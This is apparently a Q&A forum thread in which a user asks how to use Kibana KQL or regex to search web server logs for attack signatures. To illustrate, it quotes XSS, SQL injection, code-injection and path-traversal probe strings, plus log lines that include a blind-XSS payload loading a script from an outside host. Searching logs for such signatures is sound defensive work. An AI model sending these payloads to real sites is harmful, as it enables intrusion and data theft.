# What is the best practice using KQL to filter desired attack signature over (web)logs?

Tags: regex, elasticsearch, escaping, httprequest, kibana

Recently I'm experimenting with [logstach](https://www.elastic.co/logstash/) and Kibana on top of elastic over (web-)server logs. I tried to extract some attack signature like XSS & SQL injection like the following examples when logs contain `<` `$` `'` `"` `!` `.\` `%22`, and so on:

```
<script>foo</script> 
<script>document.cookie=%22testkzcp=XXX;%22</script> 
<meta%20http-equiv=Set-Cookie%20content=%22testvpmi=XXXX%22> 
${XXXXXXXXXX+5}.action  
'.print(md5(XXXXX)).' 
${@print(md5(XXXXX))}\ 
";print(md5(XXXXX));$a=" 
!(()&&!|*|*| 
.\.\.\.\.\.\.\.\.\.\/windows/win.ini
```

The following is the common error I get when using`"(("`, `".\"`, `"OR"` or `"$"` and so on using KQL:

```
KQLSyntaxError: Expected ":", "<", "<=", ">", ">=", AND, OR, end of input, whitespace but ")" found.
```

I checked [The Kibana Query Language (KQL)](https://www.elastic.co/guide/en/kibana/current/kuery-query.html#kuery-query) and tried to use `*` as [wildcard_queries](https://www.elastic.co/guide/en/kibana/current/kuery-query.html#_wildcard_queries) beside of interesting term `"</script>"` or `"%22</script>"` through my desired timestamp but it was unsuccessful. I also checked [Escaping special characters in elasticsearch](https://stackoverflow.com/questions/40222694/escaping-special-characters-in-elasticsearch).

So The question is, What is the best practice for using KQL to filter/search desired string-based attack signature over logs. Please give an example for the above-mentioned attack signatures.

Edit1: I found the [post](https://stackoverflow.com/a/64998539/10452700) that says it's possible to solve this problem using Regex in KQL as well as some workaround [here](https://stackoverflow.com/questions/54352494/issues-with-regex-in-kibana) & [here](https://stackoverflow.com/questions/65207212/regular-expressions-in-elasticsearch-kibana), So I'm also interested in finding Regex-based solution to find the afore-mentioned pattern in KQL.

Example web requests within the above-mentioned patterns:

```
[21/Jan/2021:02:02:23 +0000] XX.XXX.XXX.X "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42109 "'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/s?u=074623&r=74172-18&h=74172-7bf88-2&"></script>" "'>"></title></style></textarea></noscript></template></script><script/src="//bxss.me/s?u=074623&r=74172-18&h=74172-7bf88-2&"></script>" - - TLSv1.2 -,-,-
```

```
[19/Jan/2021:23:02:37 +0000] XXX.XXX.XXX.XX "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42109 "-1" OR 2+190-190-1=0+0+0+1 --" "-1" OR 2+190-190-1=0+0+0+1 --" - - TLSv1.2 -,-,-
```

```
[10/Jan/2021:01:11:02 +0000] XXX.XXX.XX.XX "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42133 "${@print(md5(31337))}" "${@print(md5(31337))}" - - TLSv1.2 -,-,-
```

```
[18/Jan/2022:09:13:00 +0000] XXX.XXX.XX.XX "-" "GET / HTTP/1.1" 403 "-b" 0b 1ms "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4512.0 Safari/537.36" XXX.XXX.XX.XX 42133 ")))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))" ")))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))" - - TLSv1.2 -,-,-
```

Comment: Can you show the mapping of the field this content is indexed in?

Comment: you mean [Get field mapping API](https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-get-field-mapping.html#indices-get-field-mapping) or original web-request?

Comment: As much info as you can provide. help us help you!

Comment: sure I just updated the post with full HTTP-requests. Hope it helps to find the solutions.

Comment: Can you also share your index mapping? `GET index-name`

Comment: I'm not sure if I'm allowed. Let's say no.

Comment: Ok then please at least this: `GET /indexname/_mapping/field/field-name`

Comment: It might be unnecessary maybe. Do you have regex-based idea? even I don't know how retrieve the info you asked for from Kibana on top of Elastic. Probably you mean the JSON file of event to see mapping.

Comment: Simply run the command I gave you in Kibana Dev Tools (after replacing your index name and the field name) and share the results

Comment: I just updated with the info you asked for. but I'm not sure that's going to be helped.

Comment: What comes after `/field/` should be the name of the field you are storing the textual content in, probably not `user`.